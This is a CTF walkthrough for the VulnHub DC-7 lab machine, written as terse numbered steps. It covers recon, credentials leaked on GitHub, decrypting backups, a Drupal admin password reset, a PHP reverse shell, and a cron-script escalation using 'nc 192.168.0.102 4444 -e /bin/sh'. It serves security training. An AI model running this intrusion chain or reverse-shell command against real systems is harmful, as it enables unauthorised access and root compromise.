CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


23/12/2024 Shad Hussain Knowledge Views 76 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC7 - VulnHub

Machine Link : https://www.vulnhub.com/entry/dc-7,356/ STEP1 nmap 192.168.31.253 -p- -Pn -A -T4 -sSV FINDING 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-title: Welcome to DC-7 | D7 | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.txt /web.config /admin/ | /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ | /user/password/ /user/login/ /user/logout/ /index.php/admin/ |_/index.php/comment/reply/ --------------------------------------------------------------------------------------------------------- STEP2 http://192.168.31.253/ HINT : What you will have to do, is to think "outside" the box. @DC7USER google @DC7USER https://github.com/Dc7User https://github.com/Dc7User/staffdb https://github.com/Dc7User/staffdb/blob/master/config.php FINDING ?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli_connect($servername, $username, $password, $dbname); ? --------------------------------------------------------------------------------------------------------- STEP3 ssh [email protected] pwd : MdR3xOgB7#dW --------------------------------------------------------------------------------------------------------- STEP4 cd /home/dc7user/backups ls FINDING website.sql.gpg website.tar.gz.gpg --------------------------------------------------------------------------------------------------------- STEP5 cd /opt/scripts ls -la backups.sh cat backups.sh FINDING #!/bin/bash rm /home/dc7user/backups/* cd /var/www/html/ drush sql-dump --result-file=/home/dc7user/backups/website.sql cd .. tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz --------------------------------------------------------------------------------------------------------- STEP6 cd /home/dc7user/backups gpg --decrypt website.sql.gpg /tmp/website.sql PickYourOwnPassword -- is the passphrase ls -la website.sql website.sql.gpg website.tar.gz.gpg head -n 50 website.sql cat website.sql | grep "Table structure for table" FINDING -- Table structure for table `config` -- Table structure for table `url_alias` -- Table structure for table `users` -- Table structure for table `users_data` -- Table structure for table `users_field_data` --------------------------------------------------------------------------------------------------------- STEP7 cat website.sql | grep -A 30 "Table structure for table users" cat website.sql | grep -A 40 "Table structure for table `users_field_data`" open the website.sql on mouse pad and go to 2213 line FINDING INSERT INTO `users_field_data` VALUES admin,$S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F dc7user,$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI use -- https://hashcat.net/wiki/doku.php?id=example_hashes 7900 Drupal7 $S$C33783772bRXEx1aCsvY.dqgaaSu76XmVlKrW9Qu8IQlvxHlmzLf nothing works here --------------------------------------------------------------------------------------------------------- STEP8 using drush command can we change the password just google it cd /var/www/html drush user-password admin --password=password123 Changed password for admin [success] --------------------------------------------------------------------------------------------------------- STEP9 login -- http://192.168.0.109/user/login admin password123 got to -- http://192.168.31.154/admin/modules/install --------------------------------------------------------------------------------------------------------- STEP10 go to -- https://www.drupal.org/project/php/releases/8.x-1.0 download the php module tar.gz install the module on update screen select "Enable newly added modules" option and install it from the button at the bottom then http://192.168.31.154/admin/content http://192.168.31.154/node/add go to -- http://192.168.31.154/node/add/page title will be "rshell" paste the content of all the php reverse shell code select php code in the Text format open nc listner on new terminal and click the PREVIEW button on the drupal site and the revers shell --------------------------------------------------------------------------------------------------------- STEP11 python -c import pty; pty.spawn("/bin/bash") cd /tmp wget https://github.com/DominicBreuker/pspy/releases download pspy64 chmod +x pspy64 ./pspy64 moniter the schedule file run every time FINDING /opt/scripts/backups.sh ************************ whoami www-data cd /opt/scripts ls backups.sh ls -la backups.sh -rwxrwxr-x 1 root www-data 555 Dec 18 03:04 backups.sh we can now write to this file and can take a new reverse shell on another terminal --------------------------------------------------------------------------------------------------------- STEP12 echo nc 192.168.0.102 4444 -e /bin/sh backups.sh open nc -nvlp 4444 on new terminal and wait as backup.sh run as scheduled you will get a reverse root shell --------------------------------------------------------------------------------------------------------- STEP13 on new root terminal whoami root cd root cat theflag.txt FINDING 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. Im sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 If you enjoyed this CTF, send me a tweet via @DCAU7. -------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved